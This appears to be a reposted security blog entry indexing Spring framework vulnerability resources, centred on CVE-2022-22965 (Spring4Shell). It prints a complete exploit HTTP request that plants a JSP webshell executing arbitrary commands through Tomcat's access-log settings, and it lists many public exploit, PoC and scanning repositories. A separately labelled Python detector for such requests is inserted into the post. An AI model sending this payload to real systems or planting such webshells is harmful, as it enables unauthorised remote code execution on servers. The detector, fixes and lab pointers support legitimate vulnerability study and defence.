[Repost] HackSpring - Eternal Spring

admin, 30 April 2022 13:04:17, Security Articles

HackSpring - Eternal Spring (永恒之春)

This project is a tribute to the Spring framework, the most invincible framework in the universe! It also records what I ran into while studying Spring vulnerabilities. The project is updated continuously; it was created on 30 March 2022 and last updated on 26 April 2022. Author: 0e0w[1]

01-Spring Basics[2]
02-Spring Framework Fingerprinting[3]
03-Spring Upper Layers[4]
04-Spring Vulnerability Summary[5]
05-Spring Detection and Exploitation[6]
06-Spring Vulnerability Fixes[7]
07-Spring Analysis Articles[8]
08-Spring Lab Environments[9]

01-Spring Basics

Spring
SpringBoot

02-Spring Framework Fingerprinting

https://mp.weixin.qq.com/s/cmkTMw_QS8o1wMsRd0E0XQ

03-Spring Upper Layers

Spring + ? = rce !

04-Spring Vulnerability Summary

CVE-2022-22965

05-Spring Detection and Exploitation

How do you tell whether a website is affected by a Spring vulnerability? How do you find hosts with Spring vulnerabilities on an internal network?

I. Payload

POST / HTTP/1.1
Host: 127.0.0.1:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 761

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22S%22.equals(request.getParameter(%22Tomcat%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=Shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
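Added example, written from the defender's side and not part of the HackSpring project or the original post: a small Python checker that flags logged request records carrying the property path, the AccessLogValve settings and the header-echo directive seen in the request above. The SAMPLE_REQUESTS records, the request-dict shape and the class.classLoader variant are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote

# Property-traversal prefix of CVE-2022-22965 (class.classLoader, the older
# CVE-2010-1622 path, is included as a known variant: an assumption here).
LOADER_RE = re.compile(r"^class\.(module\.)?classLoader\.", re.I)
# Tomcat AccessLogValve settings that the request above rewrites.
VALVE_RE = re.compile(r"resources\.context\.parent\.pipeline\.first\."
                      r"(pattern|suffix|directory|prefix|fileDateFormat)$", re.I)
# AccessLogValve directive that copies a request header into the log file.
HEADER_ECHO_RE = re.compile(r"%\{[^}]+\}i")

# Constructed sample records in the shape a reverse proxy or WAF might log.
SAMPLE_REQUESTS = [
    {"path": "/", "headers": {"suffix": "%>//", "c1": "Runtime", "c2": "<%"},
     "body": "class.module.classLoader.resources.context.parent.pipeline.first."
             "pattern=%25%7Bc2%7Di%20if(true)%7B%7D%20%25%7Bsuffix%7Di"
             "&class.module.classLoader.resources.context.parent.pipeline."
             "first.suffix=.jsp"},
    {"path": "/login", "headers": {}, "body": "username=alice&password=x"},
    {"path": "/", "headers": {}, "body": "",  # double-encoded dots in the query
     "query": "class%252Emodule%252EclassLoader%252Eresources%252Econtext"
              "%252Eparent%252Epipeline%252Efirst%252Edirectory=webapps%252FROOT"},
]

def deep_unquote(s: str, rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so double-encoded payloads are caught."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def scan_request(req: dict) -> list[str]:
    """Return the distinct reasons a record looks like a Spring4Shell attempt."""
    reasons = set()
    raw = req.get("body", "") + "&" + req.get("query", "")
    for name, value in parse_qsl(raw, keep_blank_values=True):
        name, value = deep_unquote(name), deep_unquote(value)
        if LOADER_RE.search(name):
            reasons.add(f"classLoader property traversal: {name}")
        if VALVE_RE.search(name):
            reasons.add(f"AccessLogValve setting rewritten: {name.rsplit('.', 1)[1]}")
        if HEADER_ECHO_RE.search(value):
            reasons.add("log pattern echoes request headers (%{...}i)")
    for hname, hvalue in req.get("headers", {}).items():
        if "<%" in hvalue or "%>" in hvalue:  # JSP tag fragments staged in headers
            reasons.add(f"JSP tag fragment in header {hname}")
    return sorted(reasons)
```

Only the first and third constructed records are flagged; the plain login form is not.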

II. Source Code Detection

https://github.com/webraybtl/springcore_detect

III. Vulnerability Verification

While testing I found that the webshell could only be written once! The second attempt failed!

IV. Vulnerability Scanning

V. Other Tools

https://github.com/TheGejr/SpringShell
https://github.com/BobTheShoplifter/Spring4Shell-POC
https://github.com/kh4sh3i/Spring-CVE
https://github.com/GuayoyoCyber/CVE-2022-22965
https://github.com/viniciuspereiras/CVE-2022-22965-poc
https://github.com/reznok/Spring4Shell-POC
https://github.com/jschauma/check-springshell
https://github.com/colincowie/Safer_PoC_CVE-2022-22965
https://github.com/alt3kx/CVE-2022-22965
https://github.com/alt3kx/CVE-2022-22965_PoC
https://github.com/exploitbin/CVE-2022-22963-Spring-Core-RCE
https://github.com/light-Life/CVE-2022-22965-GUItools
https://github.com/Mr-xn/spring-core-rce
https://github.com/Kirill89/CVE-2022-22965-PoC
https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE
https://github.com/likewhite/CVE-2022-22965
https://github.com/mebibite/springhound
https://github.com/irgoncalves/f5-waf-enforce-sig-Spring4Shell
https://github.com/hktalent/spring-spel-0day-poc
https://github.com/darryk10/CVE-2022-22963
https://github.com/WeiJiLab/Spring4Shell-POC
https://github.com/Corgizz/SpringCloud
https://github.com/NewBeginning6/spring-Framework-rce
https://github.com/wjl110/CVE-2022-22965_Spring_Core_RCE
https://github.com/k3rwin/spring-core-rce
https://github.com/thelostworldFree/SpringCloud-Config-CVE-2020-5410
https://github.com/YanMu2020/SpringScan
https://github.com/wearearima/poc-cve-2018-1273
https://github.com/metaStor/SpringScan
https://github.com/fullhunt/spring4shell-scan
https://github.com/Qualys/spring4scanwin

06-Spring Vulnerability Fixes

07-Spring Analysis Articles

https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html
https://bugalert.org/content/notices/2022-03-29-spring.html
https://websecured.io/blog/624411cf775ad17d72274d16/spring4shell-poc
https://www.springcloud.io/post/2022-03/spring-0day-vulnerability
https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement
https://tttang.com/archive/1532

08-Spring Lab Environments

https://github.com/jbaines-r7/spring4shell_vulnapp
https://github.com/Kirill89/CVE-2022-22965-PoC
https://github.com/DDuarte/springshell-rce-poc
https://github.com/XuCcc/VulEnv

Stargazers over time [10]


References

[1] 0e0w: https://github.com/0e0w
[2] 01-Spring Basics:
[3] 02-Spring Framework Fingerprinting:
[4] 03-Spring Upper Layers:
[5] 04-Spring Vulnerability Summary:
[6] 05-Spring Detection and Exploitation:
[7] 06-Spring Vulnerability Fixes:
[8] 07-Spring Analysis Articles:
[9] 08-Spring Lab Environments:
[10] Stargazers over time: https://starchart.cc/HackJava/Spring


Originally published on the WeChat official account 利刃藏锋: [Repost] HackSpring - Eternal Spring

Posted by admin on 30 April 2022 13:04:17. Original link: http://cn-sec.com/archives/965262.html